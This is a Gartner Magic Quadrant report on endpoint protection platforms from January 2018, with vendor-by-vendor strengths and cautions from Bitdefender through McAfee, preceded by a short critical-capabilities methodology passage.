This methodology requires analysts to identify the critical capabilities for a class of products or services. Each capability is then weighted in terms of its relative importance for specific product or service use cases. Next, products/services are rated in terms of how well they achieve each of the critical capabilities. A score that summarizes how well they meet the critical capabilities for each use case is then calculated for each product/service.
“Critical capabilities” are attributes that differentiate products/services in a class in terms of their quality and performance. Gartner recommends that users consider the set of critical capabilities as some of the most important criteria for acquisition decisions.
In defining the product/service category for evaluation, the analyst first identifies the leading uses for the products/services in this market. What needs are end-users looking to fulfill, when considering products/services in this market? Use cases should match common client deployment scenarios. These distinct client scenarios define the Use Cases.
The analyst then identifies the critical capabilities. These capabilities are generalized groups of features commonly required by this class of products/services. Each capability is assigned a level of importance in fulfilling that particular need; some sets of features are more important than others, depending on the use case being evaluated.
Each vendor’s product or service is evaluated in terms of how well it delivers each capability, on a five-point scale. These ratings are displayed side-by-side for all vendors, allowing easy comparisons between the different sets of features.
Ratings and summary scores range from 1.0 to 5.0:
1 = Poor or Absent: most or all defined requirements for a capability are not achieved
2 = Fair: some requirements are not achieved
3 = Good: meets requirements
4 = Excellent: meets or exceeds some requirements
5 = Outstanding: significantly exceeds requirements
To determine an overall score for each product in the use cases, the product ratings are multiplied by the weightings to come up with the product score in use cases.
The critical capabilities Gartner has selected do not represent all capabilities for any product; therefore, they may not represent those most important for a specific use situation or business objective. Clients should use a critical capabilities analysis as one of several sources of input about a product before making a product/service decision.

Magic Quadrant for Endpoint Protection Platforms

Published 24 January 2018 – ID G00325704 – 64 min read


Endpoint protection is evolving to address more of Gartner’s adaptive security architecture tasks such as hardening, investigation, incident detection, and incident response. Security and risk management leaders should ensure that their EPP vendor evolves fast enough to keep up with modern threats.

Strategic Planning Assumption

By 2021, endpoint protection platforms (EPPs) will provide automated, orchestrated incident investigation and breach response. Separate, stand-alone endpoint detection and response (EDR) solutions will focus on managed security service provider (MSSP) and large enterprise security operations center (SOC) environments.

Market Definition/Description

In September 2017, in response to changing market dynamics and client requirements, we adjusted our definition of an EPP. An EPP is a solution deployed on endpoint devices to prevent file-based malware, to detect and block malicious activity from trusted and untrusted applications, and to provide the investigation and remediation capabilities needed to dynamically respond to security incidents and alerts (see “Redefining Endpoint Protection for 2017 and 2018”).
Organizations are placing a premium on protection and detection capabilities within an EPP, and are depreciating the EPP vendors’ ability to provide data protection capabilities such as data loss prevention, encryption or server controls. Security buyers are increasingly looking to the built-in security capabilities of their OS vendors, and most organizations are adopting disk encryption at the OS level with BitLocker in Microsoft Windows 10, and FileVault in Apple macOS.
Concurrently, protection for servers has diverged from EPP, with specialized tools to address the modern hybrid data center (cloud and on-premises; see “Market Guide for Cloud Workload Protection Platforms”). Gartner recommends that organizations separate the purchasing decisions for server workloads from any product or strategy decisions involving endpoint protection. The evolutionary shift from hardware servers to VMs, containers and private/public cloud infrastructure means that server workloads now have different security requirements compared to end-user focused, interactive endpoints (see “Endpoint and Server Security: Common Goals, Divergent Solutions”).
This is a transformative period for the EPP market, and as the market has changed, so has the analysis profile used for this research. In the 2017 Magic Quadrant for Endpoint Protection Platforms, capabilities traditionally found in the EDR market (see “Market Guide for Endpoint Detection and Response Solutions”) were considered as “nice to have” features. In this 2018 research, some of these features are now core components of an EPP that can address and respond to modern threats.

Magic Quadrant

Figure 1. Magic Quadrant for Endpoint Protection Platforms

Source: Gartner (January 2018)

Vendor Strengths and Cautions

Bitdefender

Bitdefender provides good effectiveness across a broad range of platforms and capabilities. Bitdefender offers EPP and EDR in one platform, and one agent across endpoints, and physical, virtual or cloud servers.
While a large part of the installed base is in the consumer segment, the gap between enterprise and consumer business is narrowing. Bitdefender is a good choice for organizations that value malware detection accuracy and performance, as well as full support for data center and cloud workloads from a single solution provider. Bitdefender is also a partner for Microsoft’s Defender Advanced Threat Protection (ATP) platform, providing agents for Linux and macOS.
The vendor continues to round out its endpoint features for larger enterprises, and its brand awareness is low, impacting its execution. Bitdefender’s cloud-based, single-agent approach; large installed base; and recently released EDR module keep it relevant in this space.
Strengths
  • Bitdefender’s detection technology is well-regarded and performs well in third-party tests. The vendor has a long list of technology and service providers that use its detection capabilities as OEMs.
  • Bitdefender is noted by clients for ease of use, deployment and customer support, and in particular for its vision of single agent and single console (released in November 2017), providing a fully integrated EPP and EDR solution.
  • Patch management capabilities provide detailed information from the Common Vulnerability and Exposure (CVE) repository, and event severity, helping IT operations to prioritize updates and understand risks.
  • Bitdefender has partnered with Microsoft to provide protection to macOS and Linux systems in a Microsoft Windows Defender EPP environment, and will integrate with the Windows Defender ATP platform.
Cautions
  • While the macOS agent does benefit from machine learning (ML)-based detection instead of the normal substandard signature-based detection typically used for macOS, it does not report EDR data, leaving a visibility gap for most organizations.
  • The Bitdefender EPP agent lacks basic investigation capabilities like real-time indicator of compromise (IOC) searching.
  • There are no options for orchestration or automation with security orchestration, automation and response (SOAR) tools.
  • While Bitdefender has invested in growing its enterprise sales operations, mind share remains low with larger enterprises, thereby limiting shortlist opportunities and apparent viability to larger clients.

Carbon Black

Carbon Black is in the middle of a significant corporate transition, consolidating its overall offerings into a new cloud-based security platform called Predictive Security Cloud. The company’s overall offerings consist of Cb Defense (EPP), Cb Response (threat hunting and incident response), and Cb Protection (application whitelisting and device lockdown). Carbon Black began to consolidate EDR features from Cb Response into Cb Defense in 2017 as it started to build a presence in the EPP market.
Carbon Black has earned a strong reputation as offering one of the leading EDR solutions in the marketplace. Cb Response (threat hunting) is typically found in more complex environments with very mature security operations teams. The Cb Defense agent collects and sends all the unfiltered endpoint data to the cloud using a proprietary data streaming mechanism that eliminates bursting and peaks on networks.
The majority of Carbon Black clients make tactical purchases, usually a one-year subscription with options to renew at the end of the term.
Carbon Black is in the Visionaries quadrant this year, but Cb Defense is still unproven, which impacts its execution. The vendor has a poor record of participation in public, independent malware accuracy and effectiveness testing, which impacts its vision and execution in this assessment.
Strengths
  • Carbon Black provides an advanced toolset that has broad appeal with organizations that have mature security operations teams consisting of high-caliber and very experienced personnel.
  • Carbon Black’s Cb Defense solution incorporates a blended approach consisting of signatures, ML, software behavior monitoring, process isolation and memory protection, along with exploit prevention.
  • Carbon Black’s updated and streamlined console offers advanced administrators simplified views of threats via visual alerts and triage, resulting in faster detection and response.
  • Carbon Black’s rich set of APIs and broad third-party partner ecosystem provide opportunities for mature SOCs to integrate Carbon Black findings into a diverse set of analysis, workflow and case management solutions.
Cautions
  • Clients that have not yet moved to Carbon Black’s cloud-based EPP and EDR product (Cb Defense) continue to report that they are struggling with the operational complexity of their Carbon Black deployments.
  • Some advanced prevention features such as cloud detonation and hash look-ups require online access to the Carbon Black cloud infrastructure, reducing the effectiveness for devices without a permanent connection to the internet.
  • Carbon Black has not yet integrated its threat hunting module from Cb Response or its application whitelisting capabilities from Cb Protection into its cloud-based platform, so customers that require those features will need separate agents and separate management consoles.
  • Carbon Black continues to be at the premium end of cost per endpoint in terms of cost to acquire and cost to operate, especially if organizations require the EPP and the separate application whitelisting capabilities provided by Cb Protection.
  • Carbon Black has continued to favor private or sponsored malware accuracy and effectiveness tests of its product and has had a poor record of consistent participation in public tests in 2017. Consequently, it is difficult to determine its efficacy versus peers.

Cisco

Cisco’s Advanced Malware Protection (AMP) for Endpoints is a new entrant to this year’s Magic Quadrant. It consists of prevent, detect and respond capabilities deployed as a cloud-managed solution that can be hosted in a public or private cloud.
Cisco’s AMP for Endpoints leverages similar technology to the AMP capabilities on other Cisco devices. Its AMP Cloud technology detects known threats, and uses threat intelligence data from Threat Grid and Talos security researchers for exploit prevention.
Gartner clients rarely shortlist AMP for Endpoints for its technology, usually because they get a strong financial incentive when purchasing other Cisco products. Although a component of AMP for Endpoints is present in VirusTotal’s public interface, it did not participate in public endpoint-focused third-party testing in 2017, which impacts its execution and vision in this assessment.
Cisco’s AMP solution has the most appeal for existing Cisco clients that leverage other Cisco security solutions and aspire to establish security operations around Cisco products.
Strengths
  • The main strength of Cisco AMP is in threat intelligence and exploit prevention as a means of reducing the attack footprint available for compromise.
  • The Cisco AMP agents for Windows and macOS both collect process and usage data, providing EDR coverage and visibility for the most popular devices in enterprises.
  • Cisco offers a broad range of managed services, including SOCs, managed detection and response, active threat hunting, and incident support.
  • Reporting integration and data sharing between AMP and other Cisco security offerings, such as network, firewall, NGIPS, routers, email gateway and web proxies, are improving.
Cautions
  • Cisco is, first and foremost, a network security and hardware vendor, and originally exited the endpoint protection market in 2010 when it discontinued the Cisco Security Agent (CSA) product before gaining the AMP technology through the acquisition of Sourcefire.
  • Advanced malware protection requires access to the Cisco AMP Cloud to perform advanced analysis.
  • While the data provided across the dashboard is relatively comprehensive, the workflow requires multiple clicks to multiple screens to get a full understanding of the state of an endpoint or the issues being caused by malicious software.
  • The Cisco workflow provides limited role-based access, and limited case management capabilities.
  • Cisco’s AMP solution is part of a “better together” product ecosystem. Organizations that do not leverage other Cisco security solutions will realize fewer of the integration benefits, such as intelligence sharing and automated blocking of new threats at all control points.
  • Cisco AMP has not been tested widely in public, independent tests to determine its efficacy versus peers.

Comodo

The Comodo brand is best-known as a digital certificate authority and, in late October, Francisco Partners acquired a majority stake in Comodo’s certificate authority business, with Comodo planning to focus on its endpoint protection strategy.
Comodo Advanced Endpoint Protection (AEP) includes malware protection, a host-based intrusion prevention system (IPS), web filtering, a personal firewall, sandbox analysis, vulnerability analysis and patching, and a 100% classification capability that helps guarantee a good or bad verdict on all executable files. When an executable is untrusted or unknown, it is run in a tightly controlled container to isolate any potentially malicious activity.
Comodo also sells small or midsize business (SMB)-focused web gateways, web application firewalls and mobile device management. Its security products are managed from a central web-based portal that manages service request ticketing and workflow.
Strengths
  • Comodo AEP is best-known for its default deny approach, where unknown applications and executables are wrapped in secure, isolated containers, and known bad applications are blocked.
  • Comodo is showing sales strength and technical scalability as it starts making progress with a handful of global companies with more than 100,000 seats.
  • Comodo provides managed endpoint protection, detection, response and remediation services through integration with the cloud-based IT and Security Manager, and its patch, device, and asset management capabilities.
  • Comodo’s Valkyrie file verdict system is focused on file analysis, and its cloud-based threat intelligence and analysis platform benefits from intelligence gathered from Comodo customers, honeypots, crawlers and partners.
  • Gartner clients report that AEP is easy to deploy and use, and that Comodo implementation support is very responsive. Support for end-of-life OSs (e.g., Windows 2003) is good as well.
Cautions
  • The solution depends on its autocontainment capability to prevent attacks, and detection is limited to known indicators of compromise (IOCs).
  • Gartner clients report that the Linux product is lacking in functionality, with ineffective detection and no central management or monitoring capabilities.
  • According to Gartner clients, it takes too much time to tune the AEP engine to accept custom applications. This is a common scenario with application control.
  • Comodo’s new EDR product, cWatch EDR, is available for free, but has not been proven by organizations using EDR for advanced threat hunting and self-driven threat analysis. Event recording is limited, and detection is mainly based on IOC and indicators of attack (IOA) scanning.
  • cWatch EDR lacks automated remediation and incident response, but some of these capabilities are included in Comodo AEP itself.

CrowdStrike

CrowdStrike made strong progress in 2017 and managed to replace incumbent legacy EPP vendors at large organizations. With 79% of its business in North America, CrowdStrike has deployments in 176 countries and includes some very large organizations with more than 50,000 seats.
CrowdStrike Falcon’s lightweight single agent supports all environments (physical, virtual and cloud) and functions with the same agent and management console for Falcon Prevent protection and Falcon Insight EDR. With its EDR heritage, CrowdStrike records most endpoint events and sends all recorded data to its cloud for analysis and detection. Some prevention is done locally on the agent.
Alongside EPP and EDR capabilities, CrowdStrike offers a complementary service called Falcon OverWatch, at an attractive price point, leading to extremely high adoption among its installed base. Falcon OverWatch provides managed threat hunting, alerting, response and investigation assistance.
Organizations with small or no SOC teams will find the combination of Falcon OverWatch and Falcon Endpoint Protection compelling. CrowdStrike also offers a well-respected breach response service.
Strengths
  • Gartner clients report simple and easy Falcon deployments, in part due to the cloud architecture.
  • Ninety-eight percent of Falcon customers use CrowdStrike’s Falcon OverWatch managed detection and response service, which provides varying levels of service to suit varying customer requirements. If appropriate, CrowdStrike can manage Falcon deployments, incident response and remote remediation services, which is especially attractive to smaller organizations.
  • Falcon uses a range of detection and prevention tools centered around behavioral analytics that essentially implement a “deny malicious behavior” policy. Falcon analytics enable very specific response capabilities, depending on the severity of malicious behavior.
  • CrowdStrike’s cloud-based architecture provides an extensible platform that enables additional security services like IT hygiene, vulnerability assessment and threat intelligence. Its EDR and EPP functionalities are well-integrated.
  • CrowdStrike’s Falcon Insight EDR agent provides parity across Windows, macOS, and Linux systems, providing a solid visibility base for most organizations.
Cautions
  • CrowdStrike does not have an integrated deployment solution, but it does work well with third-party tools.
  • The full product is more expensive than other EPP solutions, but includes the OverWatch service, and covers the costs of cloud data storage for EDR.
  • CrowdStrike Falcon’s offline protection is greatly enhanced when connected to the cloud-based Falcon platform, so it is not suitable for air-gapped networks.
  • Like most other EDR platforms, Falcon’s EDR functionality requires skilled technical staff to use, which is why CrowdStrike’s OverWatch service is so popular with customers.
  • Customers report that CrowdStrike’s roadmap is not proactively communicated in a timely manner.

Cylance

Cylance was one of the pioneers in using machine learning to detect file-based malware, but by 2017, most EPP competitors claimed to have added ML capabilities, pressuring Cylance to more aggressively address non-file-based attacks. In late May 2017, Cylance formally launched its EDR product, CylanceOPTICS, which was late to market compared to other vendors, and generally perceived to be lacking in advanced capabilities already available in key competing products.
Eighty-five percent of Cylance’s business is in North America, although the company has about 3,700 customers across the globe, half of which represent organizations with fewer than 500 seats.
CylancePROTECT is cloud-based, with Cylance hosting and managing the console infrastructure directly. The vendor finally started participating in the VirusTotal community in 2017, but has a poor third-party test participation record when compared with established EPP vendors.
Strengths
  • Cylance has a strong OEM business, with over half of its licensed seats sold through its OEM relationships, including Dell. It also launched an MSSP partner program in 2017 and onboarded 70 new MSSPs.
  • Aside from Windows, Cylance supports macOS, Linux and virtual environments.
  • Gartner clients report a good experience, effective customer support, and effective malware and ransomware protection.
  • CylancePROTECT has a small footprint and easy-to-use management console, with low maintenance support requirements.
  • CylancePROTECT runs effectively in offline mode and doesn’t require a connection to the internet to remain effective.
Cautions
  • Administrative functions in Cylance’s management console need to be more fully developed, according to Gartner clients, in order to more easily manage several features, such as device and script control.
  • The aggressive ML capabilities prove very good at detecting new versions of known malware. As with any ML-based technology, however, it can be gamed by malware authors, and Gartner clients report that it can have a high false-positive rate. The lack of cloud-based look-ups hampers the vendor’s ability to quickly resolve false positives, leaving the customer to manage the exclusion of false positives themselves, until the vendor is able to push out a client-side rule update (which it calls Centroids), before ultimately updating the ML model.
  • CylancePROTECT and CylanceOPTICS require two separate agents with two separate installations.
  • EDR functionality does not enable automated rollback. The UI and the data captured in CylanceOPTICS are not robust enough for advanced threat hunting. Its InstaQuery only provides information from devices that are online.
  • Cylance lacks adjacent security applications, such as inventory of installed applications, IT hygiene assessments and vulnerability assessments, but does benefit from API integrations with some SOAR and security information and event management (SIEM) providers.
  • Custom applications, or applications that have not been analyzed by Cylance, may generate false positives, thereby requiring organizations to establish a whitelisting process when they release new builds of the custom application. As previously noted, once the false positive has been analyzed, Cylance’s Centroid technology will push out a new client-side rule update to mitigate the false positives until they are included in the next ML model.

Endgame

Endgame is a new entrant to the Magic Quadrant this year. It is a privately held organization that has evolved from pure EDR for large enterprise and defense organizations, with the addition of prevention capabilities for the broader enterprise market.
Endgame is one of the few vendors in this analysis that sells a single product offering — meaning there are no additional add-ons or purchases — to address protection, detection and response use cases.
Although the platform is missing a number of traditional EPP-related features, like application control or suspicious file quarantining, Endgame scores well in protection capabilities by focusing on the tools, techniques and procedures used by adversaries, rather than simply looking for bad files.
Endgame’s big differentiator is in its investigation and threat hunting capabilities, where natural-language understanding (NLU) queries, such as “Search for PowerShell” and “Find NetTraveler,” allow organizations to make use of advanced detection capabilities without the need for deep experience.
Endgame is a good EPP shortlist candidate for organizations with an existing or emerging SOC where incident investigation and response is a key requirement.
Strengths
  • The platform scales to very large deployments, and still performs fast, real-time investigation actions.
  • It lowers the barrier to entry for advanced capabilities like threat hunting, allowing less experienced security staff to begin, and often complete, investigation work.
  • Endgame has been evaluated against the Mitre ATT&CK matrix, which evaluates where in the kill-chain the product’s capabilities are designed to prevent attacks.
  • Endgame’s platform can function in a fully offline mode, with no internet required.
  • The agent utilizes hardware assistance (called HA-CFI), detecting in-memory exploit attempts by looking for abnormal behavior in the CPU register. However, this detection technology is not available when Endgame is deployed in a virtual environment, reducing the effectiveness to only DBI-based detection on those devices.
Cautions
  • No application control capabilities are provided in the agent.
  • Despite deploying an agent to every endpoint, there is no vulnerability reporting, which leaves a disconnect and creates additional work for both IT operations and security.
  • Files cannot be temporarily quarantined, and are deleted if they are deemed malicious; however, false positives can be recovered and restored from the management console as samples are collected for further analysis.
  • There is currently no macOS agent for protection or EDR, leaving a gap in visibility for most organizations.

ESET

ESET has a strong EPP market share among SMBs to large enterprises, providing solid protection with a lightweight agent. But it still manages to provide a large protection stack, including a host-based intrusion prevention system (HIPS), ML, exploit prevention, detection of in-memory attacks and ransomware behavior detection.
ESET recently launched an additional platform for EDR capabilities, called Enterprise Inspector. Customers with experienced security staff will be able to inspect and modify the detection rules within Enterprise Inspector, and further tailor them to their unique requirements.
ESET has significant security community mind share through published research, disruption of organized crime and its WeLiveSecurity website. The vendor’s completeness of vision is impacted in this assessment by its limited cloud management capabilities, and the relative lateness of its EDR capabilities.
ESET has localized support in 35 languages, which means it is an attractive choice for globally distributed organizations. Its protection capabilities make it a solid shortlist candidate for any organization.
Strengths
  • Despite the low overhead from its lightweight client, ESET’s anti-malware engine remains a consistently solid performer in test results, with a strong protection stack.
  • ESET has a comprehensive set of capabilities that incorporate operational IT into the protection and detection stack.
  • Managed EDR features delivering threat hunting and attack detection were recently made available to customers.
  • Customers can take advantage of free implementation services in some countries, reducing the burden of migrating from another vendor.
Cautions
  • Cloud-based management options are limited to Microsoft Azure or Amazon Web Services (AWS) instances, rather than a true SaaS platform. These instances can be customer self-managed, managed by a managed service provider partner or managed by ESET for North American customers.
  • Although ESET’s endpoint agent implements exploit prevention and in-memory scanning for attacks, there is no vulnerability discovery or reporting capability. These capabilities are supplied through ESET’s partner ecosystem.
  • ESET does not include application whitelisting or system lock-down capabilities in its endpoint agent; instead, applications and executables are blacklisted by file hash or through HIPS control policies.
  • The ESET macOS agent does not support real-time IOC search and does not integrate with EDR, leaving a visibility gap for many organizations.
  • The role-based administration within ESET Enterprise Inspector only allows two user modes (administrator and end user), meaning larger organizations with defined escalation paths may find implementation challenging, due to the lack of case and incident management workflow within Enterprise Inspector.

FireEye

FireEye, a new entrant to this Magic Quadrant, is a security suite vendor that provides email, web, network, endpoint security and threat intelligence, which are managed in the new Helix security operations platform launched in April 2017.
FireEye revenue from its HX Series endpoint security product is a relatively small portion of the vendor’s overall business. The HX management console is deployed through the cloud or as a virtual or on-premises hardware appliance that supports up to 100,000 endpoints. FireEye’s HX endpoint security agent is installed on 9 million endpoints globally, with over 70% of customers in North America and 15% in EMEA. FireEye’s appeal to Gartner clients is as a security suite and not as a best-of-breed endpoint security vendor.
FireEye Endpoint Security 4.0 shipped in late September 2017; therefore, market response to FireEye’s endpoint protection capabilities was limited during this research period. FireEye met the inclusion criteria by participating in its only public third-party test in late 2017, which impacts both vision and execution in this assessment.
Strengths
  • In 2017, FireEye HX added support for macOS and Linux hosts, cloud and hybrid management; bolstered prevention via an OEM signature-based AV component; and increased behavior analysis and exploit prevention.
  • HX customers that use Helix have 30 days of endpoint data stored in the cloud by default, and this can be configured for up to one year’s worth.
  • HX benefits from threat intelligence from Mandiant’s breach investigation team and iSIGHT Threat Intelligence service, as well as from FireEye products’ shared threat indicators.
  • FireEye offers a global managed detection and response service, FireEye as a Service, to help clients that are short on resources.
Cautions
  • Most of the EDR data is stored on the endpoint, with a subset stored on the HX server and, if enabled, in the cloud with FireEye Helix. Incident responders may not be able to perform a full root cause analysis involving compromised endpoints that are offline, or, as in the case of ransomware, have had their data encrypted.
  • A few Gartner clients report that HX produces high false-positive rates when the product is first implemented.
  • FireEye’s cloud-based management offering was new in 2017, and uptake was small at the time of this research.
  • Manual remediation capabilities are restricted to endpoint containment, and there is no support for automated configuration rollbacks or file restoration.
  • At the time of this research, FireEye HX has not been tested widely in public, independent tests to determine its efficacy versus peers.

Fortinet

Fortinet is a network security suite vendor that sells enterprise firewalls, email security, sandbox, web application firewalls and a few other products, including its FortiClient endpoint security software. The vendor is a new entrant to this Magic Quadrant. FortiClient is not well-known to most Gartner clients inquiring about endpoint security, and we see little adoption of it outside of Fortinet’s client base. FortiClient is becoming more focused on the enterprise space, but its current installed base is mostly in the SMB space, and about half of its customers have fewer than 1,000 seats installed.
In 2017, FortiClient generated less than 1% of the vendor’s revenue. Its track record of endpoint-focused third-party testing is poor, and this impacts its execution and vision in this assessment.
Strengths
  • The FortiClient EPP agent has four customizable modules that include components designed to work in conjunction with Fortinet products, including FortiGate (firewall), FortiSandbox, FortiMail, FortiWeb and others. It can be a good choice if an organization wants to consolidate its solutions with a network security suite vendor, rather than take a best-of-breed approach.
  • FortiClient is easy to deploy and easy to manage.
  • Patch management is part of the FortiClient application, which also benefits from FortiGuard Labs global threat intelligence and native integration with its sandbox.
  • FortiClient quarantines objects and kills processes in real time using client-side analysis and, if present, based on the FortiSandbox verdict.
  • Fortinet’s FortiGate firewall is a Leader in Gartner’s Magic Quadrant for Enterprise Network Firewalls, enabling the vendor to leverage its good reputation to sell its FortiClient EPP application.
Cautions
  • Along with the lack of independent, third-party testing to validate the accuracy and effectiveness, Gartner clients report that FortiClient needs to improve on the malware protection it affords.
  • The management console needs to be more customizable, according to Gartner clients.
  • FortiClient, together with FortiSandbox, provides only partial EDR coverage. Full EDR recording is not provided.
  • Although FortiClient includes a signatureless anti-exploit engine, the primary malware protection engine is based on rules and signatures. As such, it has more difficulty detecting unknown malicious operations and malware and zero-day attacks without the other components of Fortinet’s Advanced Threat Protection solution.
  • As a successful network security suite vendor, Fortinet is likely to continue focusing its R&D efforts on the interactions and interdependencies of its various suite modules. Without a focus on the EPP market, FortiClient is likely to be slow to develop into a complete and self-contained endpoint protection solution.

F-Secure

In 2017, F-Secure continued with its long track record for high-accuracy, lightweight and low-impact anti-malware detection with its cloud-based F-Secure Protection Service for Business (PSB) offering and on-premises solution F-Secure Business Suite. F-Secure added an integrated password manager with password protection capabilities and improved device control management to PSB and Business Suite. F-Secure also added ML capabilities to its Rapid Detection Service, which is its managed EDR solution.
Over the past 12 months, F-Secure further enhanced its product deployment and management capabilities, making it a good choice for larger, more complex enterprises.
F-Secure is focusing its investments in its managed service offerings, and has added product enhancements with a specific focus on preventing ransomware attacks.
Strengths
  • F-Secure is unique in that it works with a very rapid iteration, agile development process, with a release update every two weeks. This small update approach allows it to automate much of the agent update process, and adapt rapidly to new threats and attack techniques.
  • F-Secure has consistently good malware test results and performance tests. It includes cloud-based file intelligence look-ups and a virtual sandbox for malicious behavior detection.
  • DataGuard, a new ransomware protection capability, provides advanced protection of sensitive local and network folders by preventing modification, tampering or encryption by unauthorized applications and users.
  • Patch management capabilities are integrated in the endpoint client (on-premises and cloud) and offer automation capabilities via the management console to keep endpoints up to date. This reduces the complexities associated with traditional distinct patching processes.
  • Clients report that F-Secure’s Rapid Detection Service provides strong security specialist review, analysis and response capabilities.
  • Clients report that the F-Secure EPP solution is easy to deploy and maintain.
Cautions
  • F-Secure’s EDR offering is still evolving, and is primarily designed as a managed service called Rapid Detection Service. Organizations looking for a hands-on investigation tool will notice missing features in the current version that are found in competitive offerings, such as global process and application inventory.
  • While sales are strong in Northern Europe and the Asia/Pacific region and Japan, global organizations should review their local vendor coverage and support options to ensure that F-Secure or their chosen reseller will be able to adequately service the needs of their account.
  • F-Secure has a healthy focus on malware detection effectiveness, but it has not delivered some common protection and detection techniques available in most competitive solutions. There is no application control, application whitelisting or network-based malware sandboxing capability. This reduces the appeal of F-Secure to organizations looking for a broad baseline of protection capabilities.
  • Despite a strong brand name, the majority of F-Secure clients are sub-5,000 seats, and it is unclear how well the cloud management and investigation platform scales for larger organizations.

Kaspersky Lab

Kaspersky Lab’s “built not bought” approach has provided good integration and allows for a strong approach to managed services. The vendor is late to market with EDR capabilities, and has no vendor-managed, SaaS-type cloud-based management options for organizations with more than 1,000 endpoints to manage.
The vendor’s research team makes up one-third of the organization, and is well-known for its accurate malware detection and in-depth investigation and analysis of many sophisticated attacks.
Kaspersky Lab has been the subject of media scrutiny, citing unnamed intelligence sources, claiming that Kaspersky’s software was being used by the Russian government to access sensitive information.
While the U.S. government has issued a ban on the use of Kaspersky software by government agencies, the U.S. government has not given any evidence that Kaspersky software has been used by the Russian government to gain sensitive information. It has also not demonstrated that Kaspersky software is more vulnerable (technical or otherwise) than any other vendors’ antivirus software. Kaspersky filed an appeal in U.S. federal court in late 2017, asking that the government ban be overturned.
From a technology and malware prevention perspective, Kaspersky Lab remains a good candidate as a solution for any organization that is not constrained by U.S. government recommendations. Despite the media stories surrounding Kaspersky Lab, it continues to grow its endpoint presence globally.
Strengths
  • Kaspersky Lab is a consistent top performer in public, third-party AV tests.
  • The Kaspersky agent and management console provide detailed vulnerability reporting and prioritization, and the ability to automate the deployment of patches.
  • A semiautomated IOC search within the new EDR capabilities can take advantage of open IOC format files, making initial threat assessments fast and repeatable.
  • Kaspersky Managed Protection and Targeted Attack Discovery are fully managed threat detection services that will be attractive to organizations without a dedicated SOC.
  • Kaspersky R&D continues to publish more public reports on sophisticated attacks and threat actor investigations than any other vendor.
Cautions
  • Gartner clients report that the management console, Kaspersky Security Center, can appear complex and overwhelming, especially when compared to the fluid, user-centric design of newer EPP and EDR vendor management consoles.
  • The mainstream EDR capabilities were introduced into the Kaspersky Anti Targeted Attack Platform in late 2017, one of the last vendors to begin adding these features.
  • The EDR investigation lacks step-by-step, guided investigations for less experienced organizations, but Kaspersky Lab can provide training on using its products for advanced topics like digital forensics, malware analysis and incident response.
  • The Kaspersky Endpoint Security Cloud — a cloud-based management solution — is currently available only for SMB customers. Larger organizations looking for cloud-based management must deploy and maintain the management server in AWS or Azure.

Malwarebytes

Malwarebytes continues to gain momentum, building on its reputation as the incident response tool of choice for organizations of all sizes, and has doubled its seat count in the past 12 months.
In 2017, Malwarebytes delivered cloud-based management, and added mainstream and advanced EDR capabilities to its single agent, which includes the breach remediation tools for remediating infections. It is one of the few vendors in this space that can roll back the changes made by ransomware, including restoring files that were encrypted in the attack. This ransomware remediation can be performed remotely from the cloud management console up to 72 hours after the attack, without the need for any local access to an endpoint.
For organizations with small IT or security teams, Malwarebytes provides strong protection capabilities and some advanced EDR capabilities, all at an attractive price point. For larger organizations, or organizations with a mature security team, there are some missing enterprise features that make it a challenge to incorporate into an existing SOC workflow.
Strengths
  • The new EDR module included in Malwarebytes’ cloud-based platform provides advanced investigation capabilities that are rarely seen outside of a dedicated EDR tool. For example, the Active Response shell provides remote access to interact with processes, view and modify the registry, send and receive files, and run commands and scripts remotely.
  • Ransomware rollback can be initiated remotely, including file recovery.
  • Malwarebytes offers application hardening and exploit mitigation, anomaly detection, ML, and behavior monitoring and blocking.
  • With the exception of EDR and investigation, Malwarebytes does not require an internet connection to provide threat protection. Organizations with untethered endpoints and no network connectivity will, therefore, continue to have full protection.
  • The Malwarebytes endpoint agent can be orchestrated by workflows and triggers in enterprise-scale platforms such as IBM BigFix, Tanium, Phantom, ForeScout and SCCM.
Cautions
  • The cloud-based management is lacking in visual reporting and quick-view dashboards. Customers report that the workflow for finding and responding to alerts is inefficient.
  • Although the endpoint agent implements strong protection against exploits, there are no vulnerability discovery or reporting capabilities within the Malwarebytes administration console.
  • There are no role-based access controls or directory-based access controls available for the management console. Larger organizations may find the lack of case and incident management workflow a challenge.
  • The Malwarebytes macOS agent does not report EDR data, leaving a visibility gap for most organizations.

McAfee

Intel completed the sale of 51% of McAfee to TPG in April 2017 and, as a stand-alone company, McAfee hopes it can now refocus its efforts on the core aspect of its business: endpoint protection.
McAfee remains one of the top three incumbent EPP vendors by market share, and its execution issues over the past three years make it the top competitive target for displacement by other vendors in the EPP Magic Quadrant. Specifically, Endpoint Security (ENS) version 10.x (v.10.x) upgrades remained a very challenging adoption cycle for most McAfee clients. While the feature set and protection capabilities included in the most recent release are quite compelling, and public test scores have improved over the past year, McAfee’s execution assessment is hampered by organizations continuing to be hesitant to adopt the latest version, leaving them vulnerable to commodity malware as well as more advanced threats. Gartner client inquiry data identified McAfee as the single most-quoted EPP vendor that clients were planning to replace. Customer satisfaction scores were low again for 2017.
McAfee’s ePolicy Orchestrator (ePO) continues to be the most quoted reason for clients initially adopting McAfee solutions in their environment, or for retaining McAfee over their contract terms and subsequent renewals. However, disenchantment with the EPP product is quickly eroding the perceived value of ePO, in favor of vendors with cloud-based EPP management.
Strengths
  • McAfee’s investment in developing an EDR solution has resulted in an offering with a useful feature set.
  • ePO provides a common administrative platform for all of McAfee’s offerings and integrates with over 130 third-party applications. McAfee also offers a cloud-based ePO.
  • Available in McAfee’s advanced endpoint suites, Dynamic Application Containment (DAC) provides behavior-based containment/isolation of untrusted applications using McAfee Global Threat Intelligence data.
  • McAfee has the optional Threat Intelligence Exchange (TIE) and Data Exchange Layer (DXL) to share local object reputation information across both network and endpoint products. TIE is also part of the new common endpoint framework.
Cautions
  • Although adoption of ENS v.10.x versions has seen significant acceleration over the past year, a large number of McAfee’s clients remain on v.8.8, resulting in client questions about McAfee’s resellers’ and system integrators’ commitment to the upgrade, and the viability and effectiveness of the platform overall.
  • The vendor reports that most McAfee customers are actively engaged with ENS, but many Gartner clients still running v.8.8 were still not aware that they are entitled to move to a newer version, despite having renewed their contract within the last 12 to 24 months.
  • Although McAfee was among the first of the traditional EPP vendors to provide EDR capabilities, it remains in the early stages of customer adoption when compared to other vendors.
  • The most common customer complaints continue to be with the effectiveness of the older multiple-agent architecture in v.8.8, and its impact on deployment complexity and performance. Client inquiries reveal that many clients are not actively planning a migration process to the updated platform, and are looking for alternative vendors.
  • Clients that complete the upgrade to ENS v.10.x report only modest performance improvements over the previous v.8.8 client.

Microsoft

